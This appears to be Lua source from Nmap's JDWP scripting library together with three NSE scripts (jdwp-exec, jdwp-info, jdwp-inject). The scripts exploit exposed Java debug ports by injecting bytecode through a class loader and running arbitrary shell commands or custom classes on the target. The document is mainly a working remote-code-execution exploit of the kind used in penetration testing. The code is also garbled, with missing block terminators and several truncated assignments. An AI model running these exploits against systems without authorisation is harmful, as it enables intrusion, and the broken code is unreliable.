--@param threadID                                     The ID of the thread.
--@return (status, requestID)                 If status is false an error string is returned, else it contains 
assigned request id.
function setThreadSinglestep(socket,id,threadID)
      local params = bin.pack(">CCiCLii",1,2,1,10,threadID,0,0) -- event options see 
      local command = JDWPCommandPacket:new(id,15,1,params)
      local status, data = executeCommand(socket,command)
      if not status then
              stdnse.print_debug(2,"JDWP setThreadSinglestep() error: %s", data)
              return false,data
      local _, requestID = bin.unpack(">i",data)
      return true, requestID 

--- Uses Clear Command (2) to unset singlesteping from a thread by specified event.
--  http://docs.oracle.com/javase/1.5.0/docs/guide/jpda/jdwp/jdwp-protocol.html#JDWP_EventRequest_Clear
--@param socket                                       Socket to use to send the command.
--@param id                                           Packet id. 
--@param eventID                                      The ID of the thread.
--@return (status, requestID)                 If status is false an error string is returned, else it's nil.
function clearThreadSinglestep(socket,id,eventID)
      local params = bin.pack(">Ci",1,eventID)
      local command = JDWPCommandPacket:new(id,15,2,params)
      local status, data = executeCommand(socket,command)
      if not status then
              stdnse.print_debug(2,"JDWP clearThreadSinglestep() error: %s", data)
              return false,data
      return true,nil

--- ClassObjectReference Command Set (17) 
--  http://docs.oracle.com/javase/1.5.0/docs/guide/jpda/jdwp/jdwp-protocol.html#JDWP_ClassObjectReference

--- ReflectedType Command (1)
--  Returns the reference type reflected by this class object. 
--@param socket                                               Socket to use to send the command.
--@param id                                                   Packet id. 
--@param classObjectID                                        The ID of the object.
--@return (status, reflected_type)            If status is false an error string is returned, else reflected_type is 
object's reference type.
function getReflectedType(socket,id,classObjectID)
      local _, param
      local command = JDWPCommandPacket:new(id,17,1,bin.pack(">L",classObjectID))
      local status, data = executeCommand(socket,command)
      if not status then
              stdnse.print_debug(2,"JDWP getReflectedType() error: %s", data)
              return false,data
      local reflected_type = {
              refTypeTag = nil,
              typeID = nil
      _,reflected_type.refTypeTag, reflected_type.typeID = bin.unpack(">CL",data)
      return true, reflected_type

--- Helper function to find a method ID by its name.
-- @param socket              Socket to use for communication.
-- @param class                       ID of the class whose method we seek.
-- @param methodName  Name of the method.
-- @param skipFirst           Skip first found method.
function findMethod(socket,class,methodName,skipFirst)
      local methods 
      local methodID
      status, methods = getMethodsWithGeneric(socket,0,class)
      if not status then
              return false
      for _, method in ipairs(methods) do -- find first constructor and first defineClass() method
              stdnse.print_debug(2,"Method name: %s", method.name)
              if methodID == nil then
                      if string.find(method.name,methodName) then
                              if skipFirst then
                                      skipFirst = false
                                      methodID = method.methodID
      return methodID

--- Tries to inject specified bytes as a java class and create its instance.
--  Returns a table containing following fields:
--  * 'id'                    Injected class reference ID.
--  * 'instance'      Inected calss' instance reference ID.
--  * 'thread'                Thread in which the class was injected and instantiated.
-- @param socket              Socket to use for communication.
-- @param class_bytes String of bytes of a java class file to inject.
-- @return    (status,injectedClass) If status is false, an error message is returned, else returns a table with 
injected class info.
function injectClass(socket,class_bytes)
      local classes,status
      -- find byte array class id needed to create new array to load our bytecode into
      status,classes = getAllClassesWithGeneric(socket,0)
      if not status then
              stdnse.print_debug("getAllClassesWithGeneric failed: %s", classes)
              return false
      local byteArrayID
      for _,class in ipairs(classes) do
              if string.find(class.signature,"%[B") then
                      byteArrayID = class.typeID
      if byteArrayID == nil then
              stdnse.print_debug("finding byte arrray id failed")
              return false
      stdnse.print_debug("Found byte[] id %d",byteArrayID)
      -- find SecureClassLoader id by signature
      status, classes = getClassBySignature(socket,0,"Ljava/security/SecureClassLoader;")
      if not status then
              return false
      local secureClassLoader = classes[1].referenceTypeID
      stdnse.print_debug("Found SecureClassLoader id %d",secureClassLoader)
      -- find SecureClassLoader() constructor 
      local constructorMethodID = findMethod(socket,secureClassLoader,"<init>",true)
      -- find ClassLoader id by signature
      status, classes = getClassBySignature(socket,0,"Ljava/lang/ClassLoader;")
      if not status then
              return false
      local classLoader = classes[1].referenceTypeID
      stdnse.print_debug("Found ClassLoader id %d",classes[1].referenceTypeID)
      -- find ClassLoader's defineClass() method
      local defineClassMethodID = findMethod(socket,classLoader,"defineClass",false)
      -- find ClassLoader's resolveClass() method
      local resolveClassMethodID = findMethod(socket,classLoader,"resolveClass",false)        
      if constructorMethodID == nil or defineClassMethodID == nil or resolveClassMethodID == nil then
              stdnse.print_debug("Either constructor, defineClass or resolveClass method could not be found 
%s,%s,%s", type(constructorMethodID), type(defineClassMethodID),type(resolveClassMethodID))
              return false

      -- create array to load bytecode into
      local arrayID 
      status, arrayID = newArrayInstance(socket,0,byteArrayID,#class_bytes)
      if not status then
              stdnse.print_debug("New array failed: %s", arrayID)
              return false
      stdnse.print_debug("Created new byte array of length %d",#class_bytes)  
      -- set array values
      local temp
      status, temp = setArrayValues(socket,0,arrayID,0,class_bytes)
      if not status then
              stdnse.print_debug("Set values failed: %s", temp)
      stdnse.print_debug("Set array values to injected class bytes")                  
      -- get main thread id 
      -- in order to load a new class file, thread must be suspended by an event
      -- so we set it to singlestep, let it run and it get suspended right away
      local threads 
      status,threads = getAllThreads(socket,0)
      if not status then
              stdnse.print_debug("get threads failed: %s", threads)
              return false
      local main_thread
      local eventID
      stdnse.print_debug("Looking for main thread...")                
      for _,thread in ipairs(threads) do
              local thread_name
              status, thread_name = getThreadName(socket,0,thread)
              if not status then
                      stdnse.print_debug("getThreadName failed: %s", thread_name)
                      return false
              if thread_name == "main" then
                      stdnse.print_debug("Setting singlesteping to main thread.")             
                      status, eventID = setThreadSinglestep(socket,0,thread)
                      main_thread = thread
      if main_thread == nil then
              stdnse.print_debug("couldn't find main thread")
              return false
      -- to trigger the singlestep event, VM must be resumed
      stdnse.print_debug("Resuming VM and waiting for single step event from main thread...")         
      status, _ = resumeVM(socket,0)
      -- clear singlestep since we need to run our code in this thread and we don't want it to stop after each 
      stdnse.print_debug("Cleared singlesteping from main thread.")                   
      -- instantiate new class loader 
      local class_loader_instance 
      status, class_loader_instance = 
      if not status then
              stdnse.print_debug("newClassInstance failed: %s", class_loader_instance)
              return false
      stdnse.print_debug("Created new instance of SecureClassLoader.")                
      local injectedClass 
      -- invoke defineClass with byte array that contains our bytecode
      local defineClassArgs = bin.pack(">CLCiCi",0x5b,arrayID,0x49,0,0x49,#class_bytes) -- argument tags taken from 
      stdnse.print_debug("Calling secureClassLoader.defineClass(byte[],int,int) ...")                 
      status, injectedClass = 
      if not status then
              stdnse.print_debug("invokeObjectMethod failed: %s", injectedClass)
      -- resolve (Java's way of saying link) loaded class
      status, _ = 
-- call with injectedClass which still has a tag
      if not status then
              stdnse.print_debug("invokeObjectMethod failed:")
      -- extract the injected class' ID
      local tag,injectedClassID
      _,tag,injectedClassID = bin.unpack(">CL",injectedClass) 

      -- our class is now injected, but we need to find it's methods by calling Class.getMethods() on it
      -- and for that we need its runtime_type which is Class
      local runtime_type 
      status, runtime_type = getRuntimeType(socket,0,injectedClassID) -- should be Class
      -- find the getMethods() id     
      local getMethodsMethod = findMethod(socket,runtime_type,"getMethods",false)
      status, _ = invokeObjectMethod(socket,0,injectedClassID,main_thread,runtime_type,getMethodsMethod,0,nil) 

      stdnse.print_debug("New class defined. Injected class id : %d",injectedClassID)         
      local sig, reflected_type
      status, sig = getSignatureWithGeneric(socket,0,injectedClassID)
      stdnse.print_debug("Injected class signature: %s", sig)
      status, reflected_type = getReflectedType(socket,0,injectedClassID)     

      -- find injected class constructor
      local injectedConstructor = findMethod(socket,injectedClassID,"<init>",false)
      if injectedConstructor == nil then
              stdnse.print_debug("Couldn't find either evil method or constructor")
              return false
      -- instantiate our evil class 
      local injectedClassInstance
      status, injectedClassInstance = 
      if not status then
              return false, injectedClassInstance
      injected_class = {
              id = injectedClassID,
              instance = injectedClassInstance,
              thread = main_thread
      return true, injected_class

return _ENV;

local jdwp = require "jdwp"
local stdnse = require "stdnse"
local nmap = require "nmap"
local shortport = require "shortport"
local string = require "string"

description = [[
Script to exploit java's remote debugging port. 

When remote debugging port is left open, it is possible to inject 
java bytecode and achieve remote code execution.

Script abuses this to inject and execute Java class file that 
executes the supplied shell command and returns its output.

The script injects the JDWPSystemInfo class from 
nselib/jdwp-class/ and executes its run() method which 
accepts a shell command as its argument.


author = "Aleksandar Nikolic" 
license = "Same as Nmap--See http://nmap.org/book/man-legal.html";
categories = {"safe","discovery"}

-- @usage nmap -sT <target> -p <port> --script=+jdwp-exec --script-args cmd="date"
-- @args cmd  Command to execute on the remote system.
-- @output 
-- 2010/tcp open  search  syn-ack
-- | jdwp-exec:
-- |   date output:
-- |   Sat Aug 11 15:27:21 Central European Daylight Time 2012
-- |_

portrule = function(host, port)
        -- JDWP will close the port if there is no valid handshake within 2
      -- seconds, Service detection's NULL probe detects it as tcpwrapped.
        return port.service == "tcpwrapped"
               and port.protocol == "tcp" and port.state == "open"
               and not(shortport.port_is_excluded(port.number,port.protocol))

action = function(host, port)
      stdnse.sleep(5) -- let the remote socket recover from connect() scan
      local status,socket = jdwp.connect(host,port) -- initialize the connection
      if not status then
              stdnse.print_debug("error, %s",socket)

      -- read .class file 
      local file = io.open(nmap.fetchfile("nselib/data/jdwp-class/JDWPExecCmd.class"), "rb")
      local class_bytes = file:read("*all")
      -- inject the class
      local injectedClass
      status,injectedClass = jdwp.injectClass(socket,class_bytes)
      -- find injected class method
      local runMethodID = jdwp.findMethod(socket,injectedClass.id,"run",false)
      if runMethodID == nil then
              stdnse.print_debug("Couldn't find run method.")
              return false
      -- set run() method argument 
      local cmd = stdnse.get_script_args(SCRIPT_NAME .. '.cmd')
      if cmd == nil then 
              stdnse.print_debug("This script requires a cmd argument to be specified.")
              return false
      local cmdID
      status,cmdID = jdwp.createString(socket,0,cmd)
      local runArgs = bin.pack(">CL",0x4c,cmdID)      -- 0x4c is object type tag
      -- invoke run method
      local result    
      status, result = 
      -- get the result string
      local stringID
      _,_,stringID = bin.unpack(">CL",result)
      status,result = jdwp.readString(socket,0,stringID)      
      return stdnse.format_output(true,result)        

local jdwp = require "jdwp"
local stdnse = require "stdnse"
local nmap = require "nmap"
local shortport = require "shortport"
local string = require "string"

description = [[
Script to exploit java's remote debugging port. 

When remote debugging port is left open, it is possible to inject 
java bytecode and achieve remote code execution.

Script abuses this to inject and execute Java class file that 
returns remote system information.

author = "Aleksandar Nikolic" 
license = "Same as Nmap--See http://nmap.org/book/man-legal.html";
categories = {"default","safe","discovery"}

-- @usage nmap -sT <target> -p <port> --script=+jdwp-info
-- @output
-- 2010/tcp open  search  syn-ack
-- | jdwp-info:
-- |   Available processors: 1
-- |   Free memory: 15331736
-- |   File system root: A:\
-- |   Total space (bytes): 0
-- |   Free space (bytes): 0
-- |   File system root: C:\
-- |   Total space (bytes): 42935926784
-- |   Free space (bytes): 29779054592
-- |   File system root: D:\
-- |   Total space (bytes): 0
-- |   Free space (bytes): 0
-- |   Name of the OS: Windows XP
-- |   OS Version : 5.1
-- |   OS patch level : Service Pack 3
-- |   OS Architecture: x86
-- |   Java version: 1.7.0_01
-- |   Username: user
-- |   User home: C:\Documents and Settings\user
-- |_  System time: Sat Aug 11 15:21:44 CEST 2012

portrule = function(host, port)
        -- JDWP will close the port if there is no valid handshake within 2
      -- seconds, Service detection's NULL probe detects it as tcpwrapped.
        return port.service == "tcpwrapped"
               and port.protocol == "tcp" and port.state == "open"
               and not(shortport.port_is_excluded(port.number,port.protocol))

action = function(host, port)
      stdnse.sleep(5) -- let the remote socket recover from connect() scan
      local status,socket = jdwp.connect(host,port) -- initialize the connection
      if not status then
              stdnse.print_debug("error, %s",socket)

      -- read .class file 
      local file = io.open(nmap.fetchfile("nselib/data/jdwp-class/JDWPSystemInfo.class"), "rb")
      local class_bytes = file:read("*all")
      -- inject the class
      local injectedClass
      status,injectedClass = jdwp.injectClass(socket,class_bytes)
      -- find injected class method
      local runMethodID = jdwp.findMethod(socket,injectedClass.id,"run",false)
      if runMethodID == nil then
              stdnse.print_debug("Couldn't find run method.")
              return false
      -- invoke run method
      local result    
      status, result = 
      -- get the result string
      local stringID
      _,_,stringID = bin.unpack(">CL",result)
      status,result = jdwp.readString(socket,0,stringID)      
      -- parse results 
      return stdnse.format_output(true,result)        

local jdwp = require "jdwp"
local stdnse = require "stdnse"
local nmap = require "nmap"
local shortport = require "shortport"
local string = require "string"

description = [[
Script to exploit java's remote debugging port. 

When remote debugging port is left open, it is possible to inject 
java bytecode and achieve remote code execution.

After injection, class' run() method is executed.
Method run() has no parameters, and is expected to return a string.

You can specify your own .class file to inject by <code>filename</code> argument.
See nselib/data/jdwp-class/README for more.

author = "Aleksandar Nikolic" 
license = "Same as Nmap--See http://nmap.org/book/man-legal.html";
categories = {"safe","discovery"}

-- @usage nmap -sT <target> -p <port> --script=+jdwp-inject --script-args filename=HelloWorld.class
-- @args filename     Java .class file to inject.
-- @output
-- 2010/tcp open  search  syn-ack
-- | jdwp-inject:
-- |_  Hello world from the remote machine!
portrule = function(host, port)
        -- JDWP will close the port if there is no valid handshake within 2
      -- seconds, Service detection's NULL probe detects it as tcpwrapped.
        return port.service == "tcpwrapped"
               and port.protocol == "tcp" and port.state == "open"
               and not(shortport.port_is_excluded(port.number,port.protocol))

action = function(host, port)
      stdnse.sleep(5) -- let the remote socket recover from connect() scan
      local status,socket = jdwp.connect(host,port) -- initialize the connection
      if not status then
              stdnse.print_debug("error, %s",socket)

      -- read .class file 
      local filename = stdnse.get_script_args(SCRIPT_NAME .. '.filename')
      if filename == nil then
              stdnse.print_debug("This script requires a .class file to inject.")
              return false 
      local file = io.open(nmap.fetchfile(filename), "rb") 
      local class_bytes = file:read("*all")
      -- inject the class
      local injectedClass
      status,injectedClass = jdwp.injectClass(socket,class_bytes)
      -- find injected class method
      local runMethodID = jdwp.findMethod(socket,injectedClass.id,"run",false)
      if runMethodID == nil then
              stdnse.print_debug("Couldn't find run method.")
              return false
      -- invoke run method
      local result    
      status, result = 
      -- get the result string
      local stringID
      _,_,stringID = bin.unpack(">CL",result)
      status,result = jdwp.readString(socket,0,stringID)      
      -- parse results 
      return stdnse.format_output(true,result)        

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